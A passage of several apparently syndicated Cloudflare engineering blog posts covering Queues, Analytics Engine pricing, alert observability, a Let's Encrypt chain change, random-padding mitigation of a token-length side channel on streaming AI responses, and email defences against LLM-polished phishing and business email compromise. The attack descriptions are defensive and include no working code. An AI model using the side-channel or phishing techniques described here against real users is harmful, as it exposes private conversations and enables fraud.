     -H "Content-Type:application/json"

// Ack the messages you processed successfully; mark others to be retried.
$ curl "https://api.cloudflare.com/client/v4/accounts/${CF_ACCOUNT_ID}/queues/${QUEUE_ID}/messages/ack" -X POST --data '{"acks":["lease-id-1", "lease-id-2"],"retries":["lease-id-100"]}' \
     -H "Authorization: Bearer ${QUEUES_TOKEN}" \
     -H "Content-Type:application/json"

A pull-based consumer can run anywhere, allowing you to run queue consumers alongside your existing legacy cloud infrastructure. Teams inside Cloudflare adopted this early on, with one use-case focused on writing device telemetry to a queue from our 310+ data centers and consuming within some of our back-of-house infrastructure running on Kubernetes. Importantly, our globally distributed queue infrastructure means that messages are retained within the queue until the consumer is ready to process them.

Queues also now supports delaying messages, both when sending to a queue, as well as when marking a message for retry. This can be useful to queue (pun intended) tasks for the future, as well apply a backoff mechanism if an upstream API or infrastructure has rate limits that require you to pace how quickly you are processing messages.

// Apply a delay to a message when sending it
await env.YOUR_QUEUE.send(msg, { delaySeconds: 3600 })

// Delay a message (or a batch of messages) when marking it for retry
for (const msg of batch.messages) {
	msg.retry({delaySeconds: 300})

We’ll also be bringing substantially increased per-queue throughput over the coming months on the path to getting Queues to GA. It’s important to us that Queues is extremely reliable: lost or dropped messages means that a user doesn’t get their order confirmation email, that password reset notification, and/or their uploads processed — each of those are user-impacting and hard to recover from.

Workers Analytics Engine

Workers Analytics Engine provides unlimited-cardinality analytics at scale, via a built-in API to write data points from Workers, and a SQL API to query that data.

Workers Analytics Engine is backed by the same ClickHouse-based system we have depended on for years at Cloudflare. We use it ourselves to observe the health of our own services, to capture product usage data for billing, and to answer questions about specific customers’ usage patterns. At least one data point is written to this system on nearly every request to Cloudflare’s network. Workers Analytics Engine lets you build your own custom analytics using this same infrastructure, while we manage the hard parts for you.

Since launching in beta, developers have started depending on Workers Analytics Engine for these same use cases and more, from large enterprises to open-source projects like Counterscale. Workers Analytics Engine has been operating at production scale with mission-critical workloads for years — but we hadn’t shared anything about pricing, until today.

We are keeping Workers Analytics Engine pricing simple, and based on two metrics:

  1. Data points written — every time you call writeDataPoint() in a Worker, this counts as one data point written. Every data point costs the same amount — unlike other platforms, there is no penalty for adding dimensions or cardinality, and no need to predict what the size and cost of a compressed data point might be.
  2. Read queries — every time you post to the Workers Analytics Engine SQL API, this counts as one read query. Every query costs the same amount — unlike other platforms, there is no penalty for query complexity, and no need to reason about the number of rows of data that will be read by each query.

Both the Workers Free and Workers Paid plans will include an allocation of data points written and read queries, with pricing for additional usage as follows:


Data points written

Read queries

Workers Paid

10 million included per month

+$0.25 per additional million

1 million included per month

+$1.00 per additional million

Workers Free

100,000 included per day

10,000 included per day

With this pricing, you can answer, “how much will Workers Analytics Engine cost me?” by counting the number of times you call a function in your Worker, and how many times you make a request to a HTTP API endpoint. Napkin math, rather than spreadsheet math.

This pricing will be made available to everyone in coming months. Between now and then, Workers Analytics Engine continues to be available at no cost. You can start writing data points from your Worker today — it takes just a few minutes and less than 10 lines of code to start capturing data. We’d love to hear what you think.

The week is just getting started

Tune in to what we have in store for you tomorrow on our second day of Developer Week. If you have questions or want to show off something cool you already built, please join our developer Discord.

Minimizing on-call burnout through alerts observability

Post Syndicated from Monika Singh original https://blog.cloudflare.com/alerts-observability

Many people have probably come across the ‘this is fine’ meme or the original comic. This is what a typical day for a lot of on-call personnel looks like. On-calls get a lot of alerts, and dealing with too many alerts can result in alert fatigue – a feeling of exhaustion caused by responding to alerts that lack priority or clear actions. Ensuring the alerts are actionable and accurate, not false positives, is crucial because repeated false alarms can desensitize on-call personnel. To this end, within Cloudflare, numerous teams conduct periodic alert analysis, with each team developing its own dashboards for reporting. As members of the Observability team, we’ve encountered situations where teams reported inaccuracies in alerts or instances where alerts failed to trigger, as well as provided assistance in dealing with noisy/flapping alerts.

Observability aims to enhance insight into the technology stack by gathering and analyzing a broader spectrum of data. In this blog post, we delve into alert observability, discussing its importance and Cloudflare’s approach to achieving it. We’ll also explore how we overcome shortcomings in alert reporting within our architecture to simplify troubleshooting using open-source tools and best practices. Join us to understand how we use alerts effectively and use simple tools and practices to enhance our alerts observability, resilience, and on-call personnel health.

Being on-call can disrupt sleep patterns, impact social life, and hinder leisure activities, potentially leading to burnout. While burnout can be caused by several factors, one contributing factor can be excessively noisy alerts or receiving alerts that are neither important nor actionable. Analyzing alerts can help mitigate the risk of such burnout by reducing unnecessary interruptions and improving the overall efficiency of the on-call process. It involves periodic review and feedback to the system for improving alert quality. Unfortunately, only some companies or teams do alert analysis, even though it is essential information that every on-call or manager should have access to.

Alert analysis is useful for on-call personnel, enabling them to easily see which alerts have fired during their shift to help draft handover notes and not miss anything important. In addition, managers can generate reports from these stats to see the improvements over time, as well as helping assess on-call vulnerability to burnout. Alert analysis also helps with writing incident reports, to see if alerts were fired, or to determine when an incident started.

Let’s first understand the alerting stack and how we used open-source tools to gain greater visibility into it, which allowed us to analyze and optimize its effectiveness.

Prometheus architecture at Cloudflare

At Cloudflare, we rely heavily on Prometheus for monitoring. We have data centers in more than 310 cities, and each has several Prometheis. In total, we have over 1100 Prometheus servers. All alerts are sent to a central Alertmanager, where we have various integrations to route them. Additionally, using an alertmanager webhook, we store all alerts in a datastore for analysis.

Lifecycle of an alert

Prometheus collects metrics from configured targets at given intervals, evaluates rule expressions, displays the results, and can trigger alerts when the alerting conditions are met. Once an alert goes into firing state, it will be sent to the alertmanager.

Depending on the configuration, once Alertmanager receives an alert, it can inhibit, group, silence, or route the alerts to the correct receiver integration, such as chat, PagerDuty, or ticketing system. When configured properly, Alertmanager can mitigate a lot of alert noise. Unfortunately, that is not the case all the time, as not all alerts are optimally configured.

In Alertmanager, alerts initially enter the firing state, where they may be inhibited or silenced. They return to the firing state when the silence expires or the inhibiting alert resolves, and eventually transition to the resolved state.

Alertmanager sends notifications for firing and resolved alert events via webhook integration. We were using alertmanager2es, which receives webhook alert notifications from Alertmanager and inserts them into an Elasticsearch index for searching and analysis. Alertmanager2es has been a reliable tool for us over the years, offering ways to monitor alerting volume, noisy alerts and do some kind of alert reporting. However, it had its limitations. The absence of silenced and inhibited alert states made troubleshooting issues challenging. We often found ourselves guessing why an alert didn’t trigger – was it silenced by another alert or perhaps inhibited by one? Without concrete data, we lacked the means to confirm what was truly happening.

Since the Alertmanager doesn’t provide notifications for silenced or inhibited alert events via webhook integration, the alert reporting we were doing was somewhat lacking or incomplete. However, the Alertmanager API provides querying capabilities and by querying the /api/alerts alertmanager endpoint, we can get the silenced and inhibited alert states. Having all four states in a datastore will enhance our ability to improve alert reporting and troubleshoot Alertmanager issues.

Interfaces for providing information about alert states


We opted to aggregate all states of the alerts (firing, silenced, inhibited, and resolved) into a datastore. Given that we’re gathering data from two distinct sources (the webhook and API) each in varying formats and potentially representing different events, we correlate alerts from both sources using the fingerprint field. The fingerprint is a unique hash of the alert’s label set which enables us to match alerts across responses from the Alertmanager webhook and API.

Alertmanager webhook and API response of same alert event

The Alertmanager API offers additional fields compared to the webhook (highlighted in pastel red on the right), such as silencedBy and inhibitedBy IDs, which aid in identifying silenced and inhibited alerts. We store both webhook and API responses in the datastore as separate rows. While querying, we match the alerts using the fingerprint field.

We decided to use a vector.dev instance to transform the data as necessary, and store it in a data store. Vector.dev (acquired by Datadog) is an open-source, high-performance, observability data pipeline that supports a vast range of sources to read data from and supports a lot of sinks for writing data to, as well as a variety of data transformation operations.

Here, we use one http_server vector instance to receive Alertmanager webhook notifications, two http_client sources to query alerts and silence API endpoints, and two sinks for writing all of the state logs in ClickHouse into alerts and silences tables

Although we use ClickHouse to store this data, any other database can be used here. ClickHouse was chosen as a data store because it provides various data manipulation options. It allows aggregating data during insertion using Materialized Views, reduces duplicates with the replacingMergeTree table engine, and supports JOIN statements.

If we were to create individual columns for all the alert labels, the number of columns would grow exponentially with the addition of new alerts and unique labels. Instead, we decided to create individual columns for a few common labels like alert priority, instance, dashboard, alert-ref, alertname, etc., which helps us analyze the data in general and keep all other labels in a column of type Map(String, String). This was done because we wanted to keep all the labels in the datastore with minimal resource usage and allow users to query specific labels or filter alerts based on particular labels. For example, we can select all Prometheus alerts using  labelsmap[‘service’’] = ‘Prometheus’.


We built multiple dashboards on top of this data:

  • Alerts overview: To get insights into all the alerts the Alertmanager receives.
  • Alertname overview: To drill down on a specific alert.
  • Alerts overview by receiver: This is similar to alerts overview but specific to a team or receiver.
  • Alerts state timeline: This dashboard shows a snapshot of alert volume at a glance.
  • Jiralerts overview: To get insights into the alerts the ticket system receives.
  • Silences overview: To get insights into the Alertmanager silences.

Alerts overview

The image is a screenshot of the collapsed alerts overview dashboard by receiver. This dashboard comprises general stats, components, services, and alertname breakdown. The dashboard also highlights the number of P1 / P2 alerts in the last one day / seven days / thirty days, top alerts for the current quarter, and quarter-to-quarter comparison.

Component breakdown

We route alerts to teams and a team can have multiple services or components. This panel shows firing alerts component counts over time for a receiver. For example, the alerts are sent to the observability team, which owns multiple components like logging, metrics, traces, and errors. This panel gives an alerting component count over time, and provides a good idea about which component is noisy and at what time at a glance.

Timeline of alerts

We created this swimlane view using Grafana’s state timeline panel for the receivers. The panel shows how busy the on-call was and at what point. Red here means the alert started firing, orange represents the alert is active and green means it has resolved. It displays the start time, active duration, and resolution of an alert. This highlighted alert is changing state too frequently from firing to resolved – this looks like a flapping alert. Flapping occurs when an alert changes state too frequently. This can happen when alerts are not configured properly and need tweaking, such as adjusting the alert threshold or increasing the for duration period in the alerting rule. The for duration field in the alerting rules adds time tolerance before an alert starts firing. In other words, the alert won’t fire unless the condition is met for ‘X’ minutes.


There were a few interesting findings within our analysis. We found a few alerts that were firing and did not have a notify label set, which means the alerts were firing but were not being sent or routed to any team, creating unnecessary load on the Alertmanager. We also found a few components generating a lot of alerts, and when we dug in, we found that they were for a cluster that was decommissioned where the alerts were not removed. These dashboards gave us excellent visibility and cleanup opportunities.

Alertmanager inhibitions

Alertmanager inhibition allows suppressing a set of alerts or notifications based on the presence of another set of alerts. We found that Alertmanager inhibitions were not working sometimes. Since there was no way to know about this, we only learned about it when a user reported getting alerted for inhibited alerts. Imagine a Venn diagram of firing and inhibited alerts to understand failed inhibitions. Ideally, there should be no overlap because the inhibited alerts shouldn’t be firing. But if there is an overlap, that means inhibited alerts are firing, and this overlap is considered a failed inhibition alert.

Failed inhibition venn diagram

After storing alert notifications in ClickHouse, we were able to come up with a query to find the fingerprint of the `alertnames` where the inhibitions were failing using the following query:

SELECT $rollup(timestamp) as t, count() as count
        fingerprint, timestamp
    FROM alerts
        AND status.state = 'firing'
        fingerprint, timestamp
) AS firing
        fingerprint, timestamp
    FROM alerts
        AND status.state = 'suppressed' AND notEmpty(status.inhibitedBy)
        fingerprint, timestamp
) AS suppressed USING (fingerprint)

The first panel in the image below is the total number of firing alerts, the second panel is the number of failed inhibitions.

We can also create breakdown for each failed inhibited alert

By looking up the fingerprint from the database, we could map the alert inhibitions and found that the failed inhibited alerts have an inhibition loop. For example, alert Service_XYZ_down is inhibited by alert server_OOR, alert server_OOR is inhibited by alert server_down, and server_down is inhibited by alert server_OOR.

Failed inhibitions can be avoided if alert inhibitions are configured carefully.


Alertmanager provides a mechanism to silence an alert while it is being worked on or during maintenance. Silence can mute the alerts for a given time and it can be configured based on matchers, which can be an exact match, a regex, an alert name, or any other label. The silence matcher doesn’t necessarily translate to the alertname. By doing alert analysis, we could map the alerts and the silence ID by doing a JOIN query on the alerts and silences tables. We also discovered a lot of stale silences, where silence was created for a long duration and is not relevant anymore.

DIY Alert analysis

The directory contains a basic demo for implementing alerts observability. Running `docker-compose up` spawns several containers, including Prometheus, Alertmanager, Vector, ClickHouse, and Grafana. The vector.dev container queries the Alertmanager alerts API and writes the data into ClickHouse after transforming it. The Grafana dashboard showcases a demo of Alerts and Silences overview.

Make sure you have docker installed and run docker compose up to get started.

Visit http://localhost:3000/dashboards to explore the prebuilt demo dashboards.


As part of the observability team, we manage the Alertmanager, which is a multi-tenant system. It’s crucial for us to have visibility to detect and address system misuse, ensuring proper alerting. The use of alert analysis tools has significantly enhanced the experience for on-call personnel and our team, offering swift access to the alert system. Alerts observability has facilitated the troubleshooting of events such as why an alert did not fire, why an inhibited alert fired, or which alert silenced / inhibited another alert, providing valuable insights for improving alert management.

Moreover, alerts overview dashboards facilitate rapid review and adjustment, streamlining operations. Teams use these dashboards in the weekly alert reviews to provide tangible evidence of how an on-call shift went, identify which alerts fire most frequently, becoming candidates for cleanup or aggregation thus curbing system misuse and bolstering overall alert management. Additionally, we can pinpoint services that may require particular attention. Alerts observability has also empowered some teams to make informed decisions about on-call configurations, such as transitioning to longer but less frequent shifts or integrating on-call and unplanned work shifts.

In conclusion, alert observability plays a crucial role in averting burnout by minimizing interruptions and enhancing on-call duties’ efficiency. Offering alerts observability as a service benefits all teams by obviating the need for individual dashboard development and fostering a proactive monitoring culture.
If you found this blog post interesting and want to work on observability, please check out our job openings – we’re hiring for Alerting and Logging!

Upcoming Let’s Encrypt certificate chain change and impact for Cloudflare customers

Post Syndicated from Dina Kozlov original https://blog.cloudflare.com/upcoming-lets-encrypt-certificate-chain-change-and-impact-for-cloudflare-customers

Let’s Encrypt, a publicly trusted certificate authority (CA) that Cloudflare uses to issue TLS certificates, has been relying on two distinct certificate chains. One is cross-signed with IdenTrust, a globally trusted CA that has been around since 2000, and the other is Let’s Encrypt’s own root CA, ISRG Root X1. Since Let’s Encrypt launched, ISRG Root X1 has been steadily gaining its own device compatibility.

On September 30, 2024, Let’s Encrypt’s certificate chain cross-signed with IdenTrust will expire. To proactively prepare for this change, on May 15, 2024, Cloudflare will stop issuing certificates from the cross-signed chain and will instead use Let’s Encrypt’s ISRG Root X1 chain for all future Let’s Encrypt certificates.

The change in the certificate chain will impact legacy devices and systems, such as Android devices version 7.1.1 or older, as those exclusively rely on the cross-signed chain and lack the ISRG X1 root in their trust store. These clients may encounter TLS errors or warnings when accessing domains secured by a Let’s Encrypt certificate.

According to Let’s Encrypt, more than 93.9% of Android devices already trust the ISRG Root X1 and this number is expected to increase in 2024, especially as Android releases version 14, which makes the Android trust store easily and automatically upgradable.

We took a look at the data ourselves and found that, from all Android requests, 2.96% of them come from devices that will be affected by the change. In addition, only 1.13% of all requests from Firefox come from affected versions, which means that most (98.87%) of the requests coming from Android versions that are using Firefox will not be impacted.

Preparing for the change

If you’re worried about the change impacting your clients, there are a few things that you can do to reduce the impact of the change. If you control the clients that are connecting to your application, we recommend updating the trust store to include the ISRG Root X1. If you use certificate pinning, remove or update your pin. In general, we discourage all customers from pinning their certificates, as this usually leads to issues during certificate renewals or CA changes.

If you experience issues with the Let’s Encrypt chain change, and you’re using Advanced Certificate Manager or SSL for SaaS on the Enterprise plan, you can choose to switch your certificate to use Google Trust Services as the certificate authority instead.

For more information, please refer to our developer documentation.

While this change will impact a very small portion of clients, we support the shift that Let’s Encrypt is making as it supports a more secure and agile Internet.

Embracing change to move towards a better Internet

Looking back, there were a number of challenges that slowed down the adoption of new technologies and standards that helped make the Internet faster, more secure, and more reliable.

For starters, before Cloudflare launched Universal SSL, free certificates were not attainable. Instead, domain owners had to pay around $100 to get a TLS certificate. For a small business, this is a big cost and without browsers enforcing TLS, this significantly hindered TLS adoption for years. Insecure algorithms have taken decades to deprecate due to lack of support of new algorithms in browsers or devices. We learned this lesson while deprecating SHA-1.

Supporting new security standards and protocols is vital for us to continue improving the Internet. Over the years, big and sometimes risky changes were made in order for us to move forward. The launch of Let’s Encrypt in 2015 was monumental. Let’s Encrypt allowed every domain to get a TLS certificate for free, which paved the way to a more secure Internet, with now around 98% of traffic using HTTPS.

In 2014, Cloudflare launched elliptic curve digital signature algorithm (ECDSA) support for Cloudflare-issued certificates and made the decision to issue ECDSA-only certificates to free customers. This boosted ECDSA adoption by pressing clients and web operators to make changes to support the new algorithm, which provided the same (if not better) security as RSA while also improving performance. In addition to that, modern browsers and operating systems are now being built in a way that allows them to constantly support new standards, so that they can deprecate old ones.

For us to move forward in supporting new standards and protocols, we need to make the Public Key Infrastructure (PKI) ecosystem more agile. By retiring the cross-signed chain, Let’s Encrypt is pushing devices, browsers, and clients to support adaptable trust stores. This allows clients to support new standards without causing a breaking change. It also lays the groundwork for new certificate authorities to emerge.

Today, one of the main reasons why there’s a limited number of CAs available is that it takes years for them to become widely trusted, that is, without cross-signing with another CA. In 2017, Google launched a new publicly trusted CA, Google Trust Services, that issued free TLS certificates. Even though they launched a few years after Let’s Encrypt, they faced the same challenges with device compatibility and adoption, which caused them to cross-sign with GlobalSign’s CA. We hope that, by the time GlobalSign’s CA comes up for expiration, almost all traffic is coming from a modern client and browser, meaning the change impact should be minimal.

Mitigating a token-length side-channel attack in our AI products

Post Syndicated from Celso Martinho original https://blog.cloudflare.com/ai-side-channel-attack-mitigated

Since the discovery of CRIME, BREACH, TIME, LUCKY-13 etc., length-based side-channel attacks have been considered practical. Even though packets were encrypted, attackers were able to infer information about the underlying plaintext by analyzing metadata like the packet length or timing information.

Cloudflare was recently contacted by a group of researchers at Ben Gurion University who wrote a paper titled “What Was Your Prompt? A Remote Keylogging Attack on AI Assistants” that describes “a novel side-channel that can be used to read encrypted responses from AI Assistants over the web”.
The Workers AI and AI Gateway team collaborated closely with these security researchers through our Public Bug Bounty program, discovering and fully patching a vulnerability that affects LLM providers. You can read the detailed research paper here.

Since being notified about this vulnerability, we’ve implemented a mitigation to help secure all Workers AI and AI Gateway customers. As far as we could assess, there was no outstanding risk to Workers AI and AI Gateway customers.

How does the side-channel attack work?

In the paper, the authors describe a method in which they intercept the stream of a chat session with an LLM provider, use the network packet headers to infer the length of each token, extract and segment their sequence, and then use their own dedicated LLMs to infer the response.

The two main requirements for a successful attack are an AI chat client running in streaming mode and a malicious actor capable of capturing network traffic between the client and the AI chat service. In streaming mode, the LLM tokens are emitted sequentially, introducing a token-length side-channel. Malicious actors could eavesdrop on packets via public networks or within an ISP.

An example request vulnerable to the side-channel attack looks like this:

curl -X POST \
https://api.cloudflare.com/client/v4/accounts/<account-id>/ai/run/@cf/meta/llama-2-7b-chat-int8 \
  -H "Authorization: Bearer <Token>" \
  -d '{"stream":true,"prompt":"tell me something about portugal"}'

Let’s use Wireshark to inspect the network packets on the LLM chat session while streaming:

The first packet has a length of 95 and corresponds to the token “Port” which has a length of four. The second packet has a length of 93 and corresponds to the token “ug” which has a length of two, and so on. By removing the likely token envelope from the network packet length, it is easy to infer how many tokens were transmitted and their sequence and individual length just by sniffing encrypted network data.

Since the attacker needs the sequence of individual token length, this vulnerability only affects text generation models using streaming. This means that AI inference providers that use streaming — the most common way of interacting with LLMs — like Workers AI, are potentially vulnerable.

This method requires that the attacker is on the same network or in a position to observe the communication traffic and its accuracy depends on knowing the target LLM’s writing style. In ideal conditions, the researchers claim that their system “can reconstruct 29% of an AI assistant’s responses and successfully infer the topic from 55% of them”. It’s also important to note that unlike other side-channel attacks, in this case the attacker has no way of evaluating its prediction against the ground truth. That means that we are as likely to get a sentence with near perfect accuracy as we are to get one where only things that match are conjunctions.

Mitigating LLM side-channel attacks

Since this type of attack relies on the length of tokens being inferred from the packet, it can be just as easily mitigated by obscuring token size. The researchers suggested a few strategies to mitigate these side-channel attacks, one of which is the simplest: padding the token responses with random length noise to obscure the length of the token so that responses can not be inferred from the packets. While we immediately added the mitigation to our own inference product — Workers AI, we wanted to help customers secure their LLMs regardless of where they are running them by adding it to our AI Gateway.

As of today, all users of Workers AI and AI Gateway are now automatically protected from this side-channel attack.

What we did

Once we got word of this research work and how exploiting the technique could potentially impact our AI products, we did what we always do in situations like this: we assembled a team of systems engineers, security engineers, and product managers and started discussing risk mitigation strategies and next steps. We also had a call with the researchers, who kindly attended, presented their conclusions, and answered questions from our teams.

Unfortunately, at this point, this research does not include actual code that we can use to reproduce the claims or the effectiveness and accuracy of the described side-channel attack. However, we think that the paper has theoretical merit, that it provides enough detail and explanations, and that the risks are not negligible.

We decided to incorporate the first mitigation suggestion in the paper: including random padding to each message to hide the actual length of tokens in the stream, thereby complicating attempts to infer information based solely on network packet size.

Workers AI, our inference product, is now protected

With our inference-as-a-service product, anyone can use the Workers AI platform and make API calls to our supported AI models. This means that we oversee the inference requests being made to and from the models. As such, we have a responsibility to ensure that the service is secure and protected from potential vulnerabilities. We immediately rolled out a fix once we were notified of the research, and all Workers AI customers are now automatically protected from this side-channel attack. We have not seen any malicious attacks exploiting this vulnerability, other than the ethical testing from the researchers.

Our solution for Workers AI is a variation of the mitigation strategy suggested in the research document. Since we stream JSON objects rather than the raw tokens, instead of padding the tokens with whitespace characters, we added a new property, “p” (for padding) that has a string value of variable random length.

Example streaming response using the SSE syntax:

data: {"response":"portugal","p":"abcdefghijklmnopqrstuvwxyz0123456789a"}
data: {"response":" is","p":"abcdefghij"}
data: {"response":" a","p":"abcdefghijklmnopqrstuvwxyz012"}
data: {"response":" southern","p":"ab"}
data: {"response":" European","p":"abcdefgh"}
data: {"response":" country","p":"abcdefghijklmno"}
data: {"response":" located","p":"abcdefghijklmnopqrstuvwxyz012345678"}

This has the advantage that no modifications are required in the SDK or the client code, the changes are invisible to the end-users, and no action is required from our customers. By adding random variable length to the JSON objects, we introduce the same network-level variability, and the attacker essentially loses the required input signal. Customers can continue using Workers AI as usual while benefiting from this protection.

One step further: AI Gateway protects users of any inference provider

We added protection to our AI inference product, but we also have a product that proxies requests to any provider — AI Gateway. AI Gateway acts as a proxy between a user and supported inference providers, helping developers gain control, performance, and observability over their AI applications. In line with our mission to help build a better Internet, we wanted to quickly roll out a fix that can help all our customers using text generation AIs, regardless of which provider they use or if they have mitigations to prevent this attack. To do this, we implemented a similar solution that pads all streaming responses proxied through AI Gateway with random noise of variable length.

Our AI Gateway customers are now automatically protected against this side-channel attack, even if the upstream inference providers have not yet mitigated the vulnerability. If you are unsure if your inference provider has patched this vulnerability yet, use AI Gateway to proxy your requests and ensure that you are protected.


At Cloudflare, our mission is to help build a better Internet – that means that we care about all citizens of the Internet, regardless of what their tech stack looks like. We are proud to be able to improve the security of our AI products in a way that is transparent and requires no action from our customers.

We are grateful to the researchers who discovered this vulnerability and have been very collaborative in helping us understand the problem space. If you are a security researcher who is interested in helping us make our products more secure, check out our Bug Bounty program at hackerone.com/cloudflare.

Dispelling the Generative AI fear: how Cloudflare secures inboxes against AI-enhanced phishing

Post Syndicated from Ayush Kumar original https://blog.cloudflare.com/dispelling-the-generative-ai-fear-how-cloudflare-secures-inboxes-against-ai-enhanced-phishing

Email continues to be the largest attack vector that attackers use to try to compromise or extort organizations. Given the frequency with which email is used for business communication, phishing attacks have remained ubiquitous. As tools available to attackers have evolved, so have the ways in which attackers have targeted users while skirting security protections. The release of several artificial intelligence (AI) large language models (LLMs) has created a mad scramble to discover novel applications of generative AI capabilities and has consumed the minds of security researchers. One application of this capability is creating phishing attack content.

Phishing relies on the attacker seeming authentic. Over the years, we’ve observed that there are two distinct forms of authenticity: visual and organizational. Visually authentic attacks use logos, images, and the like to establish trust, while organizationally authentic campaigns use business dynamics and social relationships to drive their success. LLMs can be employed by attackers to make their emails seem more authentic in several ways. A common technique is for attackers to use LLMs to translate and revise emails they’ve written into messages that are more superficially convincing. More sophisticated attacks pair LLMs with personal data harvested from compromised accounts to write personalized, organizationally-authentic messages.

For example, WormGPT has the ability to take a poorly written email and recreate it to have better use of grammar, flow, and voice. The output is a fluent, well-written message that can more easily pass as authentic. Threat actors within discussion forums are encouraged to create rough drafts in their native language and let the LLM do its work.

One form of phishing attack that benefits from LLMs, which can have devastating financial impact, are Business Email Compromise (BEC) attacks. During these attacks, malicious actors attempt to dupe their victims into sending payment for fraudulent invoices; LLMs can help make these messages sound more organizationally authentic. And while BEC attacks are top of mind for organizations who wish to stop the unauthorized egress of funds from their organization, LLMs can be used to craft other types of phishing messages as well.

Yet these LLM-crafted messages still rely on the user performing an action, like reading a fraudulent invoice or interacting with a link, which can’t be spoofed so easily. And every LLM-written email is still an email, containing an array of other signals like sender reputation, correspondence patterns, and metadata bundled with each message. With the right mitigation strategy and tools in place, LLM-enhanced attacks can be reliably stopped.

While the popularity of ChatGPT has thrust LLMs into the recent spotlight, these kinds of models are not new; Cloudflare has been training its models to defend against LLM-enhanced attacks for years. Our models’ ability to look at all components of an email ensures that Cloudflare customers are already protected and will continue to be in the future — because the machine learning systems our threat research teams have developed through analyzing billions of messages aren’t deceived by nicely-worded emails.

Generative AI threats and trade offs

The riskiest of AI generated attacks are personalized based on data harvested prior to the attack. Threat actors collect this information during more traditional account compromise operations against their victims and iterate through this process. Once they have sufficient information to conduct their attack they proceed. It’s highly targeted and highly specific. The benefit of AI is scale of operations; however, mass data collection is necessary to create messages that accurately impersonate who the attacker is pretending to be.

While AI-generated attacks can have advantages in personalization and scalability, their effectiveness hinges on having sufficient samples for authenticity. Traditional threat actors can also employ social engineering tactics to achieve similar results, albeit without the efficiency and scalability of AI. The fundamental limitations of opportunity and timing, as we will discuss in the next section, still apply to all attackers — regardless of the technology used.

To defend against such attacks, organizations must adopt a multi-layer approach to cybersecurity. This includes employee awareness training, employing advanced threat detection systems that utilize AI and traditional techniques, and constantly updating security practices to protect against both AI and traditional phishing attacks.

Threat actors can utilize AI to generate attacks, but they come with tradeoffs. The bottleneck in the number of attacks they can successfully conduct is directly proportional to the number of opportunities they have at their disposal, and the data they have available to craft convincing messages. They require access and opportunity, and without both the attacks are not very likely to succeed.

BEC attacks and LLMs

BEC attacks are top of mind for organizations because they can allow attackers to steal a significant amount of funds from the target. Since BEC attacks are primarily based on text, it may seem like LLMs are about to open the floodgates. However, the reality is much different. The major obstacle limiting this proposition is opportunity. We define opportunity as a window in time when events align to allow for an exploitable condition and for that condition to be exploited — for example, an attacker might use data from a breach to identify an opportunity in a company’s vendor payment schedule. A threat actor can have motive, means, and resources to pull off an authentic looking BEC attack, but without opportunity their attacks will fall flat. While we have observed threat actors attempt a volumetric attack by essentially cold calling on targets, such attacks are unsuccessful the vast majority of the time. This is in line with the premise of BECs, as there is some component of social engineering at play for these attacks.

As an analogy, if someone were to walk into your business’ front door and demand you pay them \$20,000 without any context, a reasonable, logical person would not pay. A successful BEC attack would need to bypass this step of validation and verification, which LLMs can offer little assistance in. While LLMs can generate text that appears convincingly authentic, they cannot establish a business relationship with a company or manufacture an invoice that is authentic in appearance and style, matching those in use. The largest BEC payments are a product of not only account compromise, but invoice compromise, the latter of which are necessary for the attacker in order to provide convincing, fraudulent invoices to victims.

At Cloudflare, we are uniquely situated to provide this analysis, as our email security products scrutinize hundreds of millions of messages every month. In analyzing these attacks, we have found that there are other trends besides text which constitute a BEC attack, with our data suggesting that the vast majority of BEC attacks use compromised accounts. Attackers with access to a compromised account can harvest data to craft more authentic messages that can bypass most security checks because they are coming from a valid email address. Over the last year, 80% of BEC attacks involving \$10K or more involved compromised accounts. Out of that, 75% conducted thread hijacking and redirected the thread to newly registered domains. This is in keeping with observations that the vast majority of “successful” attacks, meaning the threat actor successfully compromised their target, leverages a lookalike domain. This fraudulent domain is almost always recently registered. We also see that 55% of these messages involving over $10K in payment attempted to change ACH payment details.

We can see an example of how this may accumulate in a BEC attack below.

The text within the message does not contain any grammatical errors and is easily readable, yet our sentiment models triggered on the text, detecting that there was a sense of urgency in the sentiment in combination with an invoice — a common pattern employed by attackers. However, there are many other things in this message that triggered different models. For example, the attacker is pretending to be from PricewaterhouseCoopers, but there is a mismatch in the domain from which this email was sent. We also noticed that the sending domain was recently registered, alerting us that this message may not be legitimate. Finally, one of our models generates a social graph unique to each customer based on their communication patterns. This graph provides information about whom each user communicates with and about what. This model flagged that, given the fresh history of this communication, this message was not business as usual. All the signals above plus the outputs of our sentiment models led our analysis engine to conclude that this was a malicious message and to not allow the recipient of this message to interact with it.

Generative AI is continuing to change and improve, so there’s still a lot to be discovered in this arena. While the advent of AI-created BEC attacks may cause an ultimate increase in the number of attacks seen in the wild, we do not expect their success rate to rise for organizations with robust security solutions and processes in place.

Phishing attack trends

In August of last year, we published our 2023 Phishing Report. That year, Cloudflare processed approximately 13 billion emails, which included blocking approximately 250 million malicious messages from reaching customers’ inboxes. Even though it was the year of ChatGPT, our analysis saw that attacks still revolved around long-standing vectors like malicious links.

Most attackers were still trying to get users to either click on a link or download a malicious file. And as discussed earlier, while Generative AI can help with making a readable and convincing message, it cannot help attackers with obfuscating these aspects of their attack.

Cloudflare’s email security models take a sophisticated approach to examining each link and attachment they encounter. Links are crawled and scrutinized based on information about the domain itself as well as on–page elements and branding. Our crawlers also check for input fields in order to see if the link is a potential credential harvester. And for attackers who put their weaponized links behind redirects or geographical locks, our crawlers can leverage the Cloudflare network to bypass any roadblocks thrown our way.

Our detection systems are similarly rigorous in handling attachments. For example, our systems know that some parts of an attachment can be easily faked, while others are not. So our systems deconstruct attachments into their primitive components and check for abnormalities there. This allows us to scan for malicious files more accurately than traditional sandboxes which can be bypassed by attackers.

Attackers can use LLMs to craft a more convincing message to get users to take certain actions, but our scanning abilities catch malicious content and prevent the user from interacting with it.

Anatomy of an email

Emails contain information beyond the body and subject of the message. When building detections, we like to think of emails as having both mutable and immutable properties. Mutable properties like the body text can be easily faked while other mutable properties like sender IP address require more effort to fake. However, there are immutable properties like domain age of the sender and similarity of the domain to known brands that cannot be altered at all. For example, let’s take a look at a message that I received.

Example email content

While the message above is what the user sees, it is a small part of the larger content of the email. Below is a snippet of the message headers. This information is typically useless to a recipient (and most of it isn’t displayed by default) but it contains a treasure trove of information for us as defenders. For example, our detections can see all the preliminary checks for DMARC, SPF, and DKIM. These let us know whether this email was allowed to be sent on behalf of the purported sender and if it was altered before reaching our inbox. Our models can also see the client IP address of the sender and use this to check their reputation. We can also see which domain the email was sent from and check if it matches the branding included in the message.

Example email headers

